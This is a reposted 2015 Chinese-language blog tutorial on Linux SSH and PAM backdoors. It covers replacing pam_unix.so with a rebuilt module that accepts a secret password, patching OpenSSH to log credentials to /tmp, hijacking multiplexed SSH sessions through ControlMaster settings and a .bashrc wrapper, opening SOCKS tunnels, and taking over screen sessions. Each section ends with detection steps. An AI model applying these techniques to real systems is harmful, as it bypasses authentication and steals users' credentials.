Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology
catalog
0. 引言 1. Pam后門 2. SSH后門 3. Hijacking SSH 4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication 5. Hijacking Active SSH Screen Sessions
?
0. 引言?
0x1: 安全攻防觀點
1. Know Your Enemy : Know Your System //客戶端攻防的戰場主要在操作系統層面,同時也包括了和系統銜接的WEB、遠程LOGIN等模塊,了解它們的特性(尤其是高性能、邊緣特性)才能更好地作出針對性的防御 2. Effectivness != Complexity //攻防是一個整體性的工程化項目,任何一個維度的漏洞都能夠導致被黑客入侵,因此并一定說內核攻防就比應用層攻防重要,它們是同等重要的。攻防手段的有效性并不一定需要通過復雜性來保證 3. Everything Is A Weapon //內力所到之處,皆為兵刃,對于操作系統的任何一個特性,只要找到正確的使用方法和組合模式,都極有可能形成一條入侵向量
0x2: Attacker vs Defender
1. For the Attacker: Use System Builtin's to Simulate Rootkit Functionality. 盡量做到潤物細無聲,即把rootkit偽裝成系統正常的工具、行為 Stop relying on tools: "Master the environment."2. For the Defender: Know Your System, Before I Use it Against You. Thinking like an attacker: "Flip the evil bit."
Relevant Link:
https://www.blacklodgeresearch.org/files/7613/6963/4840/Poor_Mans_Root_Kit_BLR_talk_PUBLIC_2013.pdf
?
1. Pam后門
PAM(插入式驗證模塊(Pluggable Authentication Module,PAM))簡單來說,就是提供了一組身份驗證、密碼驗證的統一抽象接口,應用程序員可以使用這些API接口來實現與安全性相關的功能,PAM可以作為Linux登錄驗證(包括SSH)的統一驗證入口點,也同樣出于一點,黑客可以利用PAM部署SSH代碼級的邏輯后門
0x1: 查詢本機的PAM版本
0x2: 下載對應的源代碼文件
http://pkgs.fedoraproject.org/repo/pkgs/pam/Linux-PAM-0.99.6.2.tar.bz2/52844c64efa6f8b6a9ed702eec341a4c/ http://www.linux-pam.org/pre/history/ http://www.linux-pam.org/pre/library/
0x3: 對原始的PAM so文件進行備份
cd /lib64/security
ll pam_unix.so
mv pam_unix.so pam_unix.so.bak 0x4: 修改源文件,添加邏輯后門
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix vim pam_unix_auth.c
0x5: 重新編譯pam模塊
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/ ./configure make
0x6: 使用包含邏輯后門的pam模塊替換系統默認的pam模塊
cp /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so
0x7: 測試后門
1. 使用正常root帳號、密碼登錄 2. 使用root帳號,后門密碼(pam)進行隱藏登錄
0x8: 對抗檢測方法
pam_unix是系統原生的模塊,可以使用RPM的校驗機制進行篡改檢測
1. centos rpm校驗已安裝包是否被修改 rpm -qV pam ....L.... c /etc/pam.d/fingerprint-auth ....L.... c /etc/pam.d/password-auth ....L.... c /etc/pam.d/smartcard-auth ....L.... c /etc/pam.d/system-auth S.?...... /lib64/libpam.so.0.82.2 S.?...... /lib64/libpam_misc.so.0.82.0 S.5....T. /lib64/security/pam_unix.so結果含義 /* 如果一切均校驗正常將不會產生任何輸出。如果有不一致的地方,就會顯示出來。輸出格式 1. 8位長字符串: 8位字符的每一個 用以表示文件與RPM數據庫中一種屬性的比較結果("."表示檢測通過)1) S: 文件大小 2) M: 模式e (包括權限和文件類型)3) 5: 校驗和(md5)、?: 文件不可讀4) D: 設備5) L: 符號鏈接6) U: 用戶7) G: 組8) T: 文件修改時間 2. c: 用以指配置文件 3. 文件名 */2. ubuntu dpkg -V libpam-modules ??5?????? c /etc/security/limits.conf ??5?????? /lib/x86_64-linux-gnu/security/pam_unix.so
從二進制的角度來看,被植入了代碼級邏輯后門的so文件可以被當成病毒處理,通過提取邏輯后門附近的二進制特征碼,加入殺毒特征庫,可以實現對此類后門的查殺,并禁止其被ssh加載
1. 提取包含邏輯后門的pam_unix.so的特征碼 2. 加入殺毒特征庫 3. 禁止邏輯后門pam_unix.so模塊被ssh進程加載
Relevant Link:
http://w ww.csdn123.com/html/itweb/20130911/112822_112821_112829.htm http://www.cnblogs.com/LittleHann/p/3662161.html http://bobao.360.cn/learning/detail/454.html http://www.awaysoft.com/taor/rpm%E6%A0%A1%E9%AA%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E5%8C%85%E6%98%AF%E5%90%A6%E8%A2%AB%E4%BF%AE%E6%94%B9.html
?
2. SSH后門
vi includes.h //修改后門密碼,記錄文件位置,/* +#define ILOG "/tmp/ilog" //記錄登錄到本機的用戶名和密碼 +#define OLOG "/tmp/olog" //記錄本機登錄到遠程的用戶名和密碼 +#define SECRETPW "123456654321" //后門的密碼 */
0x1: 后門行為
1. 黑客使用設置的后門密碼可以直接跨越驗證邏輯登錄 2. 管理員用root、其他帳號的登錄全部會被秘密記錄下來,相當于key logger
0x2: 對抗檢測方法
1. 二進制特征檢測1) 通過ELF格式動態定位到目標函數的位置2) 在目標函數內部采用clamav的特征庫定位方式:【特征:offset:length】 2. 使用系統rpm檢測ssh的完整性 3. 檢測程序中的string特征字符串,黑客部署的邏輯后門代碼一般都有一段字符串特征碼 4. 嘗試任意密碼登錄ssh,檢查是否被黑客部署了"無密碼邏輯后門",即黑客在判斷邏輯中直接加入了return語句,跳過任何密碼檢查邏輯
Relevant Link:
http://www.freebuf.com/tools/10474.html
?
3. Hijacking SSH
SSH can also be used to gather inteligence about other potential targets on the network,every time a user connects to a system using SSH a file is created in $HOME/.ssh/ called known_hosts,by examining this file an attacker can see other hosts that trusts the user
在黑客控制了一臺用戶機器之后,通過查看known_hosts收集信息,將有可能獲取到當前主機連接的下一臺跳板機、內網、DMZ機器,以此擴大攻擊面
Relevant Link:
https://www.defcon.org/images/defcon-15/dc15-presentations/Moore_and_Valsmith/Whitepaper/dc-15-moore_and_valsmith-WP.pdf
?
4. Hijacking SSH By Setup A Tunnel Which Allows Multiple Sessions Over The Same SSH Connection Without Re-Authentication
0x1: SSH multiplexing
Multiplexing is the ability to send more than one signal over a single line or connection. With multiplexing, OpenSSH can re-use an existing TCP connection for multiple concurrent SSH sessions rather than creating a new one each time.
1. the overhead of creating new TCP connections is eliminated. The overall number of connections that a machine may accept is a finite resource and the limit is more noticeable on some machines than on others, and varies greatly depending on both load and usage. 2. with multiplexing only a single TCP connection is set up and used regardless of whether or not there are multiple SSH sessions carried over it. 3. multiplexed connection技術可以顯著減少ssh連接時間
0x2: Setting Up Multiplexing
需要明白的是,SSH劫持是發生在被黑客控制的機器上,黑客通過SSH劫持,希望能夠無密碼獲得當前用戶連接的下一臺機器。因此,黑客需要修改的配置文件是受控制的用戶機器上的配置文件
1. ControlMaster: determines whether ssh will listen for control connections and what to do about them. 2. ControlPath: is the location for the control socket used by the multiplexed sessionsv 3. ControlPersist: can be used in conjunction with ControlMaster. 1) If set to 'yes', it will leave the master connection open in the background indefinitely to accept new connections until either killed explicitly or closed with -O. //Control sockets are removed automatically when the master connection is ended.
1. 攻擊者有root權限
vim /etc/ssh/ssh_config /* .. ControlPath /tmp/%r@%h:%p ControlMaster auto ControlPersist yes .. */
開啟了ControlMaster模式之后,如果當前用戶已經成功登錄過一次目標機器(例如遠程跳板機、DMZ機器),則黑客可以利用Multiplexing技術直接"無密碼"登錄同樣的那臺服務器,簡單來說,SSH的密碼驗證是基于TCP Connection級別的,而不是會話Session界別的,當發生Multiplexing的時候,黑客的Session可以直接繞過任何的登錄驗證
2. 攻擊者沒有root權限
vim $HOME/.ssh/config /* .. ControlPath /tmp/%r@%h:%p ControlMaster auto ControlPersist yes .. */
3. 在.bashrc里封裝ssh命令
vim $HOMW/.bashrc /* .. ssh () { /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@"; } .. */
利用了Linux Bash的自定義函數的方式、SSH動態配置參數的特性實現了開啟ControlMaster模式
0x3: 攻擊者復用Multiplexing模式下的Socket會話進行SSH連接
These settings will cause all new SSH sessions to create a persistent brokering master socket.
I've used %h in control socket commands to represent the target host, %h can be any char(s).
This socket can be used to create further sessions, without credentials, even after the original user exits their session.
0x4: Adding a dynamic tunnel
we can create a dynamic tunnel inside an existing master socket
lsof -i TCP:9090 ssh -O forward -D 9090 -S /tmp/root@112.124.20.20\:22 %h lsof -i TCP:9090
通過注入命令實現端口轉發,執行完這條命令后,我們就可以使用這臺機器的9090端口做SOCKS5代理,訪問下一跳的網段
0x5: 前面說過,如果ControlPersist為yes,則不會自動刪除sockets文件,我們可以手工rm刪除/tmp/root@112.124.20.20\:22,也可以優雅的使用
ssh -O exit -S /tmp/root@112.124.20.20\:22 %h
0x6: 對抗檢測方法
1. 檢查ssh的配置文件中,是否開啟了ControlMaster模式1) /etc/ssh/ssh_config2) $HOME/.ssh/config 2. 檢查bash自定義函數中是否有ssh()劫持 set | grep "ssh()"
Relevant Link:
https://en.wikibooks.org/wiki/OpenSSH/Cookbook/Multiplexing http://unix.stackexchange.com/questions/22965/limits-of-ssh-multiplexing http://www.anchor.com.au/blog/2010/02/ssh-controlmaster-the-good-the-bad-the-ugly/ http://www.revsys.com/writings/quicktips/ssh-faster-connections.html
?
5. Hijacking Active SSH Screen Sessions
ssh_user用戶使用screen管理ssh會話時的情景
1. 當ssh_user使用 screen ssh root@112.124.20.20 連接遠程的"112.124.20.20"時,會在/var/run/screen有顯示相應的文件2. ls -la /var/run/screen/ 可以用screen -r root/來接管會話
注入screen的ssh會話,會有一個不好的地方,就是你敲的命令,會在當前正在連接的用戶那里同時顯示,容易被發現
0x1: 對抗檢測方法
1. 檢測/var/run/screen/是否包含screen會話,這從某種程度上算是一種可疑事件
Relevant Link:
http://0xthem.blogspot.com/2015/03/hijacking-ssh-to-inject-port-forwards.html http://drops.wooyun.org/tips/5253
?
Copyright (c) 2015 Little5ann All rights reserved
?
轉載于:https://www.cnblogs.com/LittleHann/p/4596223.html
總結
以上是生活随笔為你收集整理的Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 我的世界垃圾桶怎么制作?
- 下一篇: webservice发送字符串